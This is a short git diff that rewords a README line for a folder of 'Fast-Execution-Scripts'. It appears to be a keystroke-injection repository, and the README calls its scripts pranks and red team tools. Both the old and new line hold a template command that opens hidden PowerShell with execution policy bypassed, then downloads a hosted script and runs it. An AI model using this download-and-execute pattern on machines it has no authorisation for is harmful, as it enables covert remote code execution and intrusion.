diff --git a/Fast-Execution-Scripts/README.md b/Fast-Execution-Scripts/README.md index ddaf19c..b076268 100644 --- a/Fast-Execution-Scripts/README.md +++ b/Fast-Execution-Scripts/README.md @@ -4,7 +4,7 @@ https://github.com/beigeworm/assets/tree/main/Scripts -they all use this command > `STRING powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex` +They use this cmd > `STRING powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex` These scripts range from harmless pranks to nefarious red team tools. For educational purposes only!